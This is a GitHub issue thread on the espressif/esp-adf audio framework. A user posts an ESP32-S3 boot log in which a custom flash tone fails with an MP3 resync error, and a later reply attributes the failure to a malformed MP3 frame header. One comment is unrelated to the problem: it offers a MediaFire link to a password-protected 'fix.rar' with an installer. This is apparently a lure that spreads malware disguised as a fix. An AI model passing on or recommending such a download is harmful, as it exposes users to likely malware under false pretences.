espressif/esp-adf #1257: 根据examples_flash_tone例程自制提示音，播放不了报错如下

AomyAlang, 2024-08-27:
alang@ubuntu:~/esp-adf/examples/player/pipeline_flash_tone$ idf.py -p /dev/ttyUSB0 monitor
/home/alang/esp-adf/esp-idf/tools/check_python_dependencies.py:12: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  import pkg_resources
Executing action: monitor
Running idf_monitor in directory /home/alang/esp-adf/examples/player/pipeline_flash_tone
Executing "/home/alang/.espressif/python_env/idf4.4_py3.8_env/bin/python /home/alang/esp-adf/esp-idf/tools/idf_monitor.py -p /dev/ttyUSB0 -b 115200 --toolchain-prefix xtensa-esp32s3-elf- --target esp32s3 /home/alang/esp-adf/examples/player/pipeline_flash_tone/build/play_tone_mp3.elf -m '/home/alang/.espressif/python_env/idf4.4_py3.8_env/bin/python' '/home/alang/esp-adf/esp-idf/tools/idf.py' '-p' '/dev/ttyUSB0'"...
--- idf_monitor on /dev/ttyUSB0 115200 ---
--- Quit: Ctrl+] | Menu: Ctrl+T | Help: Ctrl+T followed by Ctrl+H ---
ESP-ROM:esp32s3-20210327
Build:Mar 27 2021
rst:0x1 (POWERON),boot:0x2a (SPI_FAST_FLASH_BOOT)
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fce3808,len:0x1640
load:0x403c9700,len:0xbcc
load:0x403cc700,len:0x301c
entry 0x403c9954
I (25) boot: ESP-IDF v4.4.4-278-g3c8bc2213c-dirty 2nd stage bootloader
I (25) boot: compile time 19:13:14
I (25) boot: chip revision: v0.2
I (29) boot.esp32s3: Boot SPI Speed : 80MHz
I (33) boot.esp32s3: SPI Mode       : DIO
I (38) boot.esp32s3: SPI Flash Size : 4MB
I (43) boot: Enabling RNG early entropy source...
I (48) boot: Partition Table:
I (52) boot: ## Label            Usage          Type ST Offset   Length
I (59) boot:  0 nvs              WiFi data        01 02 00009000 00006000
I (67) boot:  1 phy_init         RF data          01 01 0000f000 00001000
I (74) boot:  2 factory          factory app      00 00 00010000 00100000
I (81) boot:  3 flash_tone       Unknown data     01 ff 00110000 00100000
I (89) boot: End of partition table
I (93) esp_image: segment 0: paddr=00010020 vaddr=3c030020 size=13820h ( 79904) map
I (116) esp_image: segment 1: paddr=00023848 vaddr=3fc947f0 size=0250ch (  9484) load
I (118) esp_image: segment 2: paddr=00025d5c vaddr=40374000 size=0a2bch ( 41660) load
I (131) esp_image: segment 3: paddr=00030020 vaddr=42000020 size=2e27ch (189052) map
I (165) esp_image: segment 4: paddr=0005e2a4 vaddr=4037e2bc size=06534h ( 25908) load
I (182) boot: Loaded app from partition at offset 0x10000
I (183) boot: Disabling RNG early entropy source...
I (194) opi psram: vendor id : 0x0d (AP)
I (194) opi psram: dev id    : 0x02 (generation 3)
I (194) opi psram: density   : 0x03 (64 Mbit)
I (198) opi psram: good-die  : 0x01 (Pass)
I (203) opi psram: Latency   : 0x01 (Fixed)
I (208) opi psram: VCC       : 0x01 (3V)
I (212) opi psram: SRF       : 0x01 (Fast Refresh)
I (218) opi psram: BurstType : 0x01 (Hybrid Wrap)
I (223) opi psram: BurstLen  : 0x01 (32 Byte)
I (228) opi psram: Readlatency  : 0x02 (10 cycles@Fixed)
I (234) opi psram: DriveStrength: 0x00 (1/1)
I (239) spiram: Found 64MBit SPI RAM device
I (244) spiram: SPI RAM mode: sram 40m
I (249) spiram: PSRAM initialized, cache is in normal (1-core) mode.
I (255) cpu_start: Pro cpu up.
I (259) cpu_start: Starting app cpu, entry point is 0x40375428
0x40375428: call_start_cpu1 at /home/alang/esp-adf/esp-idf/components/esp_system/port/cpu_start.c:148

I (0) cpu_start: App cpu up.
I (997) spiram: SPI SRAM memory test OK
I (1005) cpu_start: Pro cpu start user code
I (1005) cpu_start: cpu freq: 160000000
I (1006) cpu_start: Application information:
I (1008) cpu_start: Project name:     play_tone_mp3
I (1014) cpu_start: App version:      v2.6-123-g2fe7e478-dirty
I (1021) cpu_start: Compile time:     Aug 27 2024 19:13:09
I (1027) cpu_start: ELF file SHA256:  ec2cdae50bc072e5...
I (1033) cpu_start: ESP-IDF:          v4.4.4-278-g3c8bc2213c-dirty
I (1040) cpu_start: Min chip rev:     v0.0I (1049) cpu_start: Chip rev:         v0.2
I (1054) heap_init: Initializing. RAM available for dynamic allocation:
I (1062) heap_init: At 3FC97870 len 00051EA0 (327 KiB): D/IRAM
I (1068) heap_init: At 3FCE9710 len 00005724 (21 KiB): STACK/DIRAM
I (1075) heap_init: At 3FCF0000 len 00008000 (32 KiB): DRAM
I (1081) heap_init: At 600FE000 len 00002000 (8 KiB): RTCRAM
I (1087) spiram: Adding pool of 8192K of external SPI memory to heap allocator
I (1096) spi_flash: detected chip: gd
I (1100) spi_flash: flash io: dio
W (1104) spi_flash: Detected size(16384k) larger than the size in the binary image header(4096k). Using the size in the binary image header.
I (1117) sleep: Configure to isolate all GPIO pins in sleep state
I (1124) sleep: Enable automatic switching of GPIO sleep configuration
I (1131) cpu_start: Starting scheduler on PRO CPU.
I (0) cpu_start: Starting scheduler on APP CPU.
I (1152) spiram: Reserving pool of 32K of internal memory for DMA/internal allocations
I (1152) TONE_MP3_EXAMPLE: [ 1 ] Start codec chip
W (1182) I2C_BUS: I2C bus has been already created, [port:0]
W (1212) ES7210: Enable TDM mode. ES7210_SDP_INTERFACE2_REG12: 2
I (1232) TONE_MP3_EXAMPLE: [2.0] Create audio pipeline for playback
I (1232) TONE_MP3_EXAMPLE: [2.1] Create tone stream to read data from flash
I (1232) TONE_MP3_EXAMPLE: [2.2] Create i2s stream to write data to codec chip
W (1242) I2S: APLL not supported on current chip, use I2S_CLK_D2CLK as default clock source
I (1252) TONE_MP3_EXAMPLE: [2.3] Create mp3 decoder to decode mp3 file
I (1262) TONE_MP3_EXAMPLE: [2.4] Register all elements to audio pipeline
I (1262) TONE_MP3_EXAMPLE: [2.5] Link it together [flash]-->tone_stream-->mp3_decoder-->i2s_stream-->[codec_chip]
I (1272) TONE_MP3_EXAMPLE: [2.6] Set up  uri (file as tone_stream, mp3 as mp3 decoder, and default output is i2s)
I (1282) TONE_MP3_EXAMPLE: [ 3 ] Set up event listener
I (1292) TONE_MP3_EXAMPLE: [3.1] Listening event from all elements of pipeline
I (1302) TONE_MP3_EXAMPLE: [ 4 ] Start audio_pipeline
W (1372) TONE_STREAM: No more data,ret:0 ,info.byte_pos:76670
E (1372) MPEG_READER: Resync error (line 536)
E (1372) MP3_DECODER: Encountered error reading when MP3 init
E (1372) AUDIO_ELEMENT: [mp3] AEL_STATUS_ERROR_OPEN,-1
W (1382) AUDIO_ELEMENT: [mp3] audio_element_on_cmd_error,7
W (1392) AUDIO_ELEMENT: IN-[i2s] AEL_IO_ABORT
I (1392) TONE_MP3_EXAMPLE: [ 4 ] Listen for all pipeline events
W (1422) TONE_MP3_EXAMPLE: [ * ] Stop event received
I (1422) TONE_MP3_EXAMPLE: [ 5 ] Stop audio_pipeline
W (1422) AUDIO_ELEMENT: [tone] Element already stopped
W (1422) AUDIO_ELEMENT: [mp3] Element already stopped
W (1432) AUDIO_ELEMENT: [i2s] Element already stopped
W (1432) AUDIO_PIPELINE: There are no listener registered
W (1442) AUDIO_ELEMENT: [tone] Element has not create when AUDIO_ELEMENT_TERMINATE
W (1452) AUDIO_ELEMENT: [i2s] Element has not create when AUDIO_ELEMENT_TERMINATE
W (1462) AUDIO_ELEMENT: [mp3] Element has not create when AUDIO_ELEMENT_TERMINATE

yldzmuhammed, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

hbler99, 2024-08-30:
The error E (1372) MPEG_READER: Resync error (line 536) indicates an issue with your MP3 file, possibly related to the frame header, which is causing the MP3 audio to fail during decoding. You may want to check your MP3 file.

jason-mao, 2024-12-10:
@amoyalang 这个问题进展如何，有什么状态可以分享的吗？

closed 2025-02-17 by jason-mao